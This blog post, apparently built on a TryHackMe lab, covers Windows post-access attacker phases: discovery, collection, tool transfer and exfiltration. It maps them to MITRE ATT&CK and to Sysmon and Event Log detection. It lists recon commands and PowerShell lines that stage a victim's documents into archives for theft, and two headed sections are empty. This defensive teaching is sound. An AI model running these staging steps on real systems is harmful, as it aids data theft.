Introduction — Beyond Initial Access

In Part 1: Initial Access, we examined how attackers first breach Windows environments — through brute-forced RDP, phishing attachments, or infected USB devices. But once inside, the story doesn’t stop there.

After gaining a foothold, adversaries immediately begin Discovery, Collection, and Ingress Tool Transfer — three post-access phases that determine how far they can go. These are the crucial minutes where intruders map the terrain, harvest credentials, and bring in specialized tools to expand control.

In this blog, we’ll trace these steps using TryHackMe Windows Threat Detection lab and confirmed case patterns from ransomware operators like BlackSuit, Medusa, and data stealers like RedLine Stealer.

Each section connects MITRE ATT&CK techniques with their practical footprint in Windows Event Logs and Sysmon.

Windows Discovery Phase: Understanding the Attacker’s First Orientation

After gaining access, the attacker’s first move is understanding the system — “Who am I, where am I, and what can I do?”

This phase maps directly to MITRE’s Discovery (TA0007) tactic.

Starting with Reconnaissance?

Attackers start with basic reconnaissance commands — things every Windows admin (and attacker) uses daily- often through PowerShell or cmd.exe

whoami
ipconfig /all
net user
systeminfo
tasklist
net view /domain

As we can see, In BlackSuit ransomware cases, threat actors often executed these commands within minutes of initial access — usually from the same session that succeeded the RDP brute force (explained in Part 1)

Mapping with MITRE

For deeper reference, explore the MITRE ATT&CK Discovery matrix (TA0007) — it defines how adversaries map environments post-access.”

How to find traces in logs:

Use the Logon ID from the successful RDP session (Event ID 4624) to correlate discovery commands. In most cases, we’ll see the same ID linked to cmd.exe or powershell.exe processes — confirmation that reconnaissance occurred in that session.

EventID: 4624  → Logon ID: 0x1b2a3
Sysmon ID 1    → Parent Process: cmd.exe (Logon ID: 0x1b2a3)

When we find this pattern, we’ve confirmed the attacker is now interacting live with the system.

• Sysmon Event ID 1 (ProcessCreate): cmd.exe and PowerShell command runs

• Security Event ID ll4688: new process creation (if audit logging enabled)

  
  

Why it matters: Discovery often happens within minutes of login. A cluster of these commands tied to one Logon ID = early hands-on activity.

Collection — Gathering What Matters

After mapping the system, attackers move on to gathering information worth stealing.

Collection can be as simple as copying text files and credential caches, or as complex as staging browser data and documents before exfiltration.

MITRE ATT&CK classifies this as TA0009 – Collection, which covers adversary techniques used to gather and stage data prior to exfiltration.

Gremlin Stealer and RedLine are malware families automating this phase. They silently grab browser sessions, VPN credentials, Telegram tokens, and even take screenshots (see Unit42’s analysis).

Common Indicators:

• Creation of new directories with random suffixes (staging_58f1, data_01.tmp)

• Execution of compression utilities:

  Compress-Archive -Path C:\Users\ -DestinationPath C:\Users\Public\data.zip

• Files written to C:\Users\Public\ or C:\ProgramData\ — typical staging areas.

  
  

In TryHackMe lab, this stage was simulated using PowerShell commands such as:

Get-ChildItem C:\Users\victim\Documents -Recurse -Filter *.pdf
Compress-Archive -Path C:\Temp -DestinationPath C:\Temp\data.zip

How It Appears in Logs:

• Sysmon 1: PowerShell execution with keywords Compress-Archive, copy, Out-File

• Sysmon 11: File creation — .zip, .rar, or .7z archives

• Sysmon 13: Registry access (for credential harvesting)

Ingress Tool Transfer: Loading New Weapons

Once attackers know where they are and what’s valuable, they’ll transfer additional tools into the environment. This is the Ingress Tool Transfer phase — when utilities like credential dumpers, network scanners, or remote agents are downloaded or copied to the compromised host.

MITRE calls this Ingress Tool Transfer (T1105).

For example, DFIR Report’s analysis of Remcos RAT infections showed the malware arriving through PowerShell downloads using Invoke-WebRequest, while Mimikatz often appeared as a secondary payload retrieved via certutil.exe. Both highlight how native Windows utilities can be abused for silent tool imports

Common Methods

Detection:

• Sysmon 1: PowerShell, certutil, or curl process creation

• Sysmon 3: Network connection to suspicious domains

• Sysmon 11: New .exe file creation in C:\Temp\ or C:\Users\Public\

Exfiltration: sending stolen data out.

Every intrusion ultimately ends with data exfiltration, where attackers transfer stolen data from a compromised Windows system to external destinations — such as cloud storage, attacker-controlled C2 servers, or file-sharing services like Dropbox or Mega. This phase, tracked under MITRE ATT&CK T1041 – Exfiltration Over C2 Channel, often marks the final stage of the Windows threat lifecycle.

While many organizations focus on detecting initial breaches, the exfiltration phase often reveals the true impact — what data left the network, where it went, and how. Analysts correlate DNS or network logs with process telemetry to spot outbound data flows to suspicious domains.

Example Case – AXIOM Campaign: Analysts observed the AXIOM group using Hikit, a persistence backdoor, to exfiltrate data via fake update servers impersonating trusted services such as Amazon or Windows Update.

Reference Table

This completes our Windows Threat Detection two-part series — walking from the first signs of intrusion to the final act of exfiltration. These patterns repeat across most modern ransomware and espionage campaigns.